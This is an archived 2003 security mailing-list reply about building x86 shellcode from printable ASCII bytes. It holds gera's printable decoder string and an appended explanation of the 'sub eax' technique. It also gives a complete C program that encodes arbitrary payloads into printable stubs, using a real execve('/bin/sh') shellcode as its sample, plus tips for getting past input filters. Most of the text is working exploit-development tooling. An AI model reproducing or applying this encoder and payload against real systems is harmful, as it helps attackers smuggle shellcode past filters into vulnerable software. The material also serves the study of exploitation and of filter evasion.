Re: Shellcode from ASCII

From: Gerardo Richarte (geraat_private)
Date: Thu Jun 26 2003 - 07:39:18 PDT

  • Next message: Roland Postle: "Re: GetPC code (was: Shellcode from ASCII)"

    martin rakhmanoff wrote:
    
    > Usually when coding exploits one needs to escape null bytes in shellcode. 
    > To do this XOR is often used. My question is: is it possible to escape not 
    > only null bytes but also non-ascii bytes?
    > In other words is it possible to have shellcode (for Windows 2000/XP/2003) 
    > that consists of bytes with codes 0x21-0x7e?
    
    	Here I'm sending our solution to the problem; we came to
    it after starting a small challenge to have some fun with some
    friends. This solution will somehow be enough for you. One of
    the other guys in the challenge (we were 4 total, if not 3) made
    a much better solution, without using anything but numbers and
    letters (I think).
    
    TY```T]Q\%GERA%(*).P^HPYQFFFF3Dw:+Dw:+Dw:+Dw:3E\3Dw61D76QXgeraBOO@T||lJAB@XXXXDABNLTTPE@@NXHXXEFIL\\L\GDBL\\X\LEEA@DDDEAAO@@@@
    
    	This code (also attached) assumes %edi is pointing to its
    first byte, and after that, it's a generic decoder (pretty much like
    an xor decoder) with the benefit of only using "ascii" characters,
    both in the decoding routine and the encoded part.
    	Now, the encoder and the reversing of it I both leave as an
    exercise to the reader and hope to see discussed in this list :-) and, erm...
    be careful with the encoder, it was what consumed most of my time
    when we wrote it.
    
    	On the next email I'll be starting a different challenge, for
    which I still have no good answer, and furthermore, I think there is
    no generic answer, if there is one at all... (sounds challenging, eh?!)
    
    	gera
    
    
    
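A note on Martin's question that the message above leaves implicit: an XOR-based encoder cannot do the job on its own, because XORing any number of bytes below 0x80 can never set bit 7, so 0x80..0xff are unreachable from printable operands. The usual way around it is subtraction with carry, the "sub eax" trick from rix's Phrack 57 article: zero eax with two ANDs of printable immediates (the `%GERA%(*).` near the start of gera's code is exactly that, `%` being `and eax, imm32` and `GERA` AND `(*).` being zero in every byte), then `sub eax, imm32` three times with printable immediates whose sum mod 2^32 is the wanted dword, and `push eax`. The C program below is an added, stand-alone example of that scheme; it is not gera's encoder and not code from this thread, and it uses the unrolled sub/push form rather than gera's loop decoder. `find_subs`, `ascii_encode`, `decode_sim` and `roundtrip_ok` are names chosen here, and the sample payload (a Linux x86 execve("/bin/sh") stub) is a constructed stand-in picked only because it mixes printable bytes with bytes above 0x7f.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PR_LO 0x21u   /* printable range asked for in the thread: 0x21..0x7e */
#define PR_HI 0x7eu

/* Split v (0x63..0x17a) into three bytes, each in PR_LO..PR_HI. */
static void split3(unsigned v, uint8_t out[3])
{
    unsigned a = v - 2 * PR_LO;           /* leave room for two minimum bytes */
    if (a > PR_HI) a = PR_HI;
    unsigned b = v - a - PR_LO;
    if (b > PR_HI) b = PR_HI;
    out[0] = (uint8_t)a; out[1] = (uint8_t)b; out[2] = (uint8_t)(v - a - b);
}

/* Three printable dwords with imm[0]+imm[1]+imm[2] == sum (mod 2^32).
   Byte by byte from the LSB, carrying into the next byte when needed. */
void find_subs(uint32_t sum, uint32_t imm[3])
{
    uint8_t b[3][4];
    unsigned carry = 0;
    for (int i = 0; i < 4; i++) {
        int v = (int)((sum >> (8 * i)) & 0xffu) - (int)carry;
        if (v < 0x63) { v += 256; carry = 1; } else { carry = 0; }
        uint8_t t[3];
        split3((unsigned)v, t);
        for (int k = 0; k < 3; k++) b[k][i] = t[k];
    }
    for (int k = 0; k < 3; k++)
        imm[k] = (uint32_t)b[k][0] | (uint32_t)b[k][1] << 8 |
                 (uint32_t)b[k][2] << 16 | (uint32_t)b[k][3] << 24;
}

static size_t put_imm(uint8_t *o, uint8_t opcode, uint32_t imm)
{
    o[0] = opcode;
    for (int i = 0; i < 4; i++) o[1 + i] = (uint8_t)(imm >> (8 * i));
    return 5;
}

/* Encode len payload bytes (NOP-padded to a dword multiple) into a printable
   x86 stub: and/and to zero eax once, then sub,sub,sub,push per dword, last
   dword first so the pushes leave the payload in order. 0 if cap is too small. */
size_t ascii_encode(const uint8_t *code, size_t len, uint8_t *out, size_t cap)
{
    size_t ndw = (len + 3) / 4, n = 0;
    if (ndw == 0 || cap < 10 + 16 * ndw) return 0;
    n += put_imm(out + n, 0x25, 0x41414141u);   /* and eax, 'AAAA' */
    n += put_imm(out + n, 0x25, 0x3e3e3e3eu);   /* and eax, '>>>>'  -> eax = 0 */
    uint32_t prev = 0;
    for (size_t j = ndw; j-- > 0; ) {
        uint32_t dw = 0;
        for (int i = 0; i < 4; i++)
            dw |= (uint32_t)(4 * j + i < len ? code[4 * j + i] : 0x90) << (8 * i);
        uint32_t imm[3];
        find_subs(prev - dw, imm);              /* eax = prev - sum(imm) = dw */
        for (int k = 0; k < 3; k++) n += put_imm(out + n, 0x2d, imm[k]); /* sub eax */
        out[n++] = 0x50;                        /* push eax */
        prev = dw;
    }
    return n;
}

int is_printable(const uint8_t *s, size_t n)
{
    for (size_t i = 0; i < n; i++) if (s[i] < PR_LO || s[i] > PR_HI) return 0;
    return 1;
}

/* Interpreter for just the three opcodes the stub uses, so the round trip can be
   checked without running native code. Pushes grow down from stack+cap; the
   decoded bytes are moved to stack[0..] on return. 0 on any other opcode. */
size_t decode_sim(const uint8_t *stub, size_t n, uint8_t *stack, size_t cap)
{
    uint32_t eax = 0xdeadbeefu;                 /* garbage: stub must not rely on it */
    size_t sp = cap, pc = 0;
    while (pc < n) {
        uint8_t op = stub[pc];
        if (op == 0x50) {
            if (sp < 4) return 0;
            sp -= 4;
            for (int i = 0; i < 4; i++) stack[sp + i] = (uint8_t)(eax >> (8 * i));
            pc += 1;
        } else if ((op == 0x25 || op == 0x2d) && pc + 5 <= n) {
            uint32_t imm = 0;
            for (int i = 0; i < 4; i++) imm |= (uint32_t)stub[pc + 1 + i] << (8 * i);
            eax = (op == 0x25) ? (eax & imm) : (eax - imm);
            pc += 5;
        } else return 0;
    }
    memmove(stack, stack + sp, cap - sp);
    return cap - sp;
}

/* Encode, check every stub byte is printable, simulate, compare. 1 on success. */
int roundtrip_ok(const uint8_t *code, size_t len)
{
    uint8_t stub[4096], back[1024];
    size_t n = ascii_encode(code, len, stub, sizeof stub);
    if (n == 0 || !is_printable(stub, n)) return 0;
    if (decode_sim(stub, n, back, sizeof back) != ((len + 3) / 4) * 4) return 0;
    return memcmp(back, code, len) == 0;
}

int main(void)
{
    static const uint8_t payload[] = {   /* constructed sample, any bytes will do */
        0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,
        0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80 };
    uint8_t stub[256];
    size_t n = ascii_encode(payload, sizeof payload, stub, sizeof stub);
    printf("%zu stub bytes, roundtrip=%d\n%.*s\n", n,
           roundtrip_ok(payload, sizeof payload), (int)n, (const char *)stub);
    return 0;
}
```

Two caveats a practitioner will hit. First, this stub decodes onto the stack, so something printable must first point esp just past the stub's last byte so that the pushed dwords land where execution falls through; gera's decoder avoids that by assuming %edi already points at its own first byte. Second, the unrolled form costs 16 stub bytes per 4 payload bytes, and "printable" is not the same as "survives every filter": `%` (0x25) and `-` (0x2d) are the opcodes here and cannot be avoided in this scheme. The simulator models only those three instructions and executes nothing.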



    This archive was generated by hypermail 2b30 : Thu Jun 26 2003 - 10:12:00 PDT